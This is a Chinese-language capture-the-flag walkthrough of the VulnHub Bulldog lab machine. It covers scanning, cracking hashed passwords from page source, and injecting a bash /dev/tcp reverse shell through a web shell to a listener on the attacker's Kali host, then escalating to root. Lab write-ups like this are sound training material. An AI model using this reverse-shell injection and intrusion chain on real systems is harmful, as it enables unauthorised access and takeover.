目录
环境搭建
1、百度网盘链接:https://pan.baidu.com/s/1v33Khmnk-M6tLEP7uDBC0g?pwd=bull
2、也可去官网下载Bulldog: 1 ~ VulnHub
下载下来去虚拟机创建即可。
漏洞复现
设备信息:
kali(NAT模式)IP:192.168.22.135
bulldog(NAT模式)IP:192.168.22.139
信息收集
1、扫描22网段内存活主机,135是主机,那139就是靶机ip
方法一:nmap -sP 192.168.22.0/24
方法二:输入 netdiscover -i eth0 -r 192.168.22.0/24
-i:指定网卡设备
-r:指定扫描网段
2、扫描一下靶机开放端口
nmap -sS -T4 -A -p- 192.168.22.139
-sS:半开扫描,记入系统日志风险小
-T4:指定扫描过程中使用的时序(分为0-5等级,推荐用4)
-A:全面系统检测,启用脚本检测和扫描-p-:扫描所有TCP端口
主机开放80端口访问靶机ip
3、接dirb http://192.168.22.139/下来扫描网站根目录
dirb http://192.168.22.139/
得到目录去挨个访问
web渗透
1、访问http://192.168.22.139/admin,一个登录界面,可以尝试弱口令,但是试不出来
2、访问http://192.168.22.139/dev/shell,啥都没有
3、访问http://192.168.22.139/dev,如下页面,感觉没啥用
查看一下页面源代码,有五个邮箱,有可能是用户名,后面的编码区解码查看一下
https://www.cmd5.com/
https://www.somd5.com/可以去这两个网站进行解码
最后试了只有后两个可以解码成功
ddf45997a7e18a25ad5f5cf222da64814dd060d5解码为bulldog
d8b8dd5e7f000b8dea26ef8428caf38c04466b3e解码为bulldogover
4、然后再去访问http://192.168.22.139/admin,用刚才的猜想用邮箱前的疑似用户名加上后面解密出的当做用户名和密码进行登录
用户名:nick 密码:bulldog
用户名:sarah 密码:bulldogover
登录成功
5、再去访问http://192.168.22.139/dev/shell,发现可以成功访问,列出来的命令都可以执行
6、命令注入&nc反弹shell
(1)在主机kali上设置一个端口进行监听
nc -lvp 1234
(2)开始反弹shell,在输入框中输入以下内容
echo 'bash -i >& /dev/tcp/192.168.22.135/1234 0>&1' | bash #中间的ip是主机kali的地址,监听端口设置的啥就写啥
(3)去kali上查看,kali收到反弹shell并成功登录到靶机
提权
1、输入cat /etc/passwd 产看一下用户,发现用户bulldogadmin
2、切换到home目录下cd bulldogadmin进入目录
3、输入ls -al查看隐藏文件.hiddenadmindirectory,进入并查看
4、cat查看这两个文件没有什么可用信息,还可以用strings来查看
4、这几个字符串可能是密码,把它们连到一起正好是SUPERultimatePASSWORDyouCANTget,H是来混淆的,连在一起可以发现中间刚好有PASSWORD
直接切换root用户发现不行,可以用用 Python 调用本地的 shell 实现
python -c 'import pty; pty.spawn("/bin/bash")'
这已经提权成功